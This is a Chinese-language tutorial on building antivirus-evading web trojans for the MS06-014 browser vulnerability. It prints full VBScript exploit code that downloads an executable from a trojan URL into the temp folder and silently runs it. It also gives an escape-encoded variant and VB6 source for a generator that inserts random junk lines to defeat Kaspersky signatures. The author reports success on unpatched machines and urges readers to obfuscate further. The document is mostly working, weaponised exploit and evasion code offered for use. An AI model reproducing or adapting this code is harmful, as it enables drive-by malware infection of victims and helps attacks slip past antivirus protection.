| 最近对制作免杀网页木马产生了兴趣,于是便找来ms06014网页木马的代码来看,发现了一些问题,其代码如下:
<html>
<script language="VBScript">
on error resume next
dl = "http://木马地址"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.wrITe x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>人鱼姬ms06014</tITle>
</head><body>
<center></center>
</body></html>
如果用现在比较常用的Unicode加密会不会免杀呢?加密之后的代码如下:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3Chtml%3E%0D%0A%20%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%20%20%20%20dl%20%3D%20%22http%3A//%u6728%u9A6C%u5730%u5740%22%0D%0A%20%20%20%20Set%20df%20%3D%20document.createElement%28%22object%22%29%0D%0A%20%20%20%20df.setAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556-65A3-11D0-983A-00C04FC29E36%22%0D%0A%20%20%20%20str%3D%22Microsoft.XMLHTTP%22%0D%0A%20%20%20%20Set%20x%20%3D%20df.CreateObject%28str%2C%22%22%29%0D%0A%20%20%20%20a1%3D%22Ado%22%0D%0A%20%20%20%20a2%3D%22db.%22%0D%0A%20%20%20%20a3%3D%22Str%22%0D%0A%20%20%20%20a4%3D%22eam%22%0D%0A%20%20%20%20str1%3Da1%26a2%26a3%26a4%0D%0A%20%20%20%20str5%3Dstr1%0D%0A%20%20%20%20set%20S%20%3D%20df.createobject%28str5%2C%22%22%29%0D%0A%20%20%20%20S.type%20%3D%201%0D%0A%20%20%20%20str6%3D%22GET%22%0D%0A%20%20%20%20x.Open%20str6%2C%20dl%2C%20False%0D%0A%20%20%20%20x.Send%0D%0A%20%20%20%20fname1%3D%22g0ld.com%22%0D%0A%20%20%20%20set%20F%20%3D%20df.createobject%28%22Scripting.FileSystemObject%22%2C%22%22%29%0D%0A%20%20%20%20set%20tmp%20%3D%20F.GetSpecialFolder%282%29%20%0D%0A%20%20%20%20fname1%3D%20F.BuildPath%28tmp%2Cfname1%29%0D%0A%20%20%20%20S.open%0D%0A%20%20%20%20S.write%20x.responseBody%0D%0A%20%20%20%20S.savetofile%20fname1%2C2%0D%0A%20%20%20%20S.close%0D%0A%20%20%20%20set%20Q%20%3D%20df.createobject%28%22Shell.Application%22%2C%22%22%29%0D%0A%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%20%20%20%20%3C/script%3E%0D%0A%20%20%20%20%3Chead%3E%0D%0A%20%20%20%20%3Ctitle%3E%u4EBA%u9C7C%u59ECms06014%3C/tITle%3E%0D%0A%20%20%20%20%3C/head%3E%3Cbody%3E%0D%0A%09%3Ccenter%3E%3C/center%3E%0D%0A%20%20%20%20%3C/body%3E%3C/html%3E%0D%0A"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.wrITe(NewWords);
}
OutWord();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
用卡巴扫描一下,如图1所示,表面上是免杀了。
看来Unicode加密不可行,并不能完全免杀。在加密之前的代码中有一句VBScript的容错语句:on error resume next,意思是说如果某个语句执行错误,就不报错,继续往下执行下一句。那么,我们是不是可以利用这种情况做些什么呢?基于此,我构思了一个永久卡巴免杀的ms06014网页木马生成器,用VB语言实现。具体的原理就是随机生成很多字符串,把它们夹杂在每行VBScript之间,这样就可以迷惑杀毒软件了。因为随机生成的字符串执行起来肯定会出错,所以就会根据容错语句执行下一句,而不会影响VBScript的执行。实际上这种网页木马生成器在概念上是比较好的,因为其中夹杂的字符串是随机生成的,每次生成的网页木马都不一样,卡巴就没法提取具体的特征码了,所以我们可以认为每次生成的网页木马都是一个免杀的个人版本。程序的关键代码如下:
Private Sub Command1_Click()
a = FreeFile() '获得一个可用的文件号
Open ".\renyuji.htm" For Output As #a
'打开当前目录下的renyuji.htm文件,没有就创建一个
Print #a, "<html>"
Print #a, "<script language=""VBScript"">"
Print #a, "on error resume next"
Call suiji(a)
'从容错语句开始,每隔一行代码就调用suiji()过程向文件中加入干扰代码
Print #a, "dl = """ & Text2.Text & """"
'注意,凡是网页文件中出现的引号,为了正确显示,这里都要写为两个引号
Call suiji(a)
Print #a, "Set df = document.createElement(""object"")"
Call suiji(a)
Print #a, "df.setAttribute ""classid"", ""clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"""
Call suiji(a)
Print #a, "str=""Microsoft.XMLHTTP"""
Call suiji(a)
Print #a, "Set x = df.CreateObject(str,"""")"
Call suiji(a)
Print #a, "a1=""Ado"""
Call suiji(a)
Print #a, "a2=""db."""
Call suiji(a)
Print #a, "a3=""Str"""
Call suiji(a)
Print #a, "a4=""eam"""
Call suiji(a)
Print #a, "str1=a1&a2&a3&a4"
Call suiji(a)
Print #a, "str5=str1"
Call suiji(a)
Print #a, "set S = df.createobject(str5,"""")"
Call suiji(a)
Print #a, "S.type = 1"
Call suiji(a)
Print #a, "str6=""GET"""
Call suiji(a)
Print #a, "x.Open str6, dl, False"
Call suiji(a)
Print #a, "x.Send"
Call suiji(a)
Print #a, "fname1=""g0ld.com"""
Call suiji(a)
Print #a, "set F = df.createobject(""Scripting.FileSystemObject"","""")"
Call suiji(a)
Print #a, "set tmp = F.GetSpecialFolder(2) "
Call suiji(a)
Print #a, "fname1= F.BuildPath(tmp,fname1)"
Call suiji(a)
Print #a, "S.open"
Call suiji(a)
Print #a, "S.wrITe x.responseBody"
Call suiji(a)
Print #a, "S.savetofile fname1,2"
Call suiji(a)
Print #a, "S.close"
Call suiji(a)
Print #a, "set Q = df.createobject(""Shell.Application"","""")"
Call suiji(a)
Print #a, "Q.ShellExecute fname1,"""","""",""open"",0"
Call suiji(a)
Print #a, "</script>"
'到这里VB脚本就结束了,不再加入干扰代码
Print #a, "<head>"
Print #a, "<title>人鱼姬ms06014</tITle>"
Print #a, "</head><body>"
Print #a, "<center></center>"
Print #a, "</body></html>"
Close #a '关闭文件,千万不能忘
MsgBox "已经在当前目录下生成renyuji.htm ", 64, "人鱼姬提示"
End Sub
Public Sub suiji(a)
'此过程用于向文件中写入规定行数的随机生成的由大小写字母组成的字符串,在ASCII码中,A~Z为65~90,a~z为97~122
Dim b, e, g As Integer
Dim d As String
e = Text1.Text '取得用户输入的干扰代码的行数
g = Text3.Text '取得用户输入的干扰代码的位数
For f = 1 To e '每循环一次,就写入一行干扰码,行数由用户的输入决定
d = ""
For c = 1 To g
'每循环一次,变量d就增加一位随机字母,位数由用户的输入决定
Randomize '设置随机种子
b = Fix(65 + Rnd * 58)
'生成65~122的随机数
While (90 < b And b < 97)
'如果在90~97之间就重来,目的是生成65~90或97~122之间的随机数
Randomize
b = Fix(65 + Rnd * 58)
Wend
d = d & Chr$(b)
'把随机生成的字母加到变量d的后面
Next c
Print #a, d '写入一行干扰码
Next f
End Sub
编写完成后,最后的程序界面如图3所示。输入木马网址后,点击“生成”按钮,生成的网页木马代码如下所示:
<html>
<script language="VBScript">
on error resume next
OishnyffWHfEScObRWtgdqnMf
GNIVZkHJUZARgCYSGjtusyhhP
otwmOXFloLkpFQixjZyXVvate
dl = "http://"
iLivoJFxZQLYlCMXrlSUyVeYB
MMKQkrzbqpHLOFbsjYDGDIXTA
PmmQiNdMhBBNHIcPclEUjJDeg
……代码省略……
set Q = df.createobject("Shell.Application","")
DAFUaxMyjNgfKpJtyyKEYVoNi
iBRjgGBbdOektiRzHPrFEWUqH
zhTVmSXhdQBBajxswQnQWkYrl
Q.ShellExecute fname1,"","","open",0
rnATemoyZTuwahDMAdcRZbuXX
jaXtZCzfYpekvccTUsBPpLoOc
qdaZnkJrDKFSfhEGRlWxOsAVS
</script>
<head>
<title>人鱼姬ms06014</tITle>
</head><body>
<center></center>
</body></html>
经过测试,在装有卡巴斯基而且没有打ms06014补丁的机器上可以工作正常。遗憾的是,这种方法加密的网页木马依然会被诺顿查杀,大家可以在此基础上自行加密以进一步免杀。另外,软件中的干扰代码的位数和行数都是可设置的,可根据个人需要选择。实际上,这种免杀方法的运用范围还是很广泛的,希望大家能够很好的掌握。
|
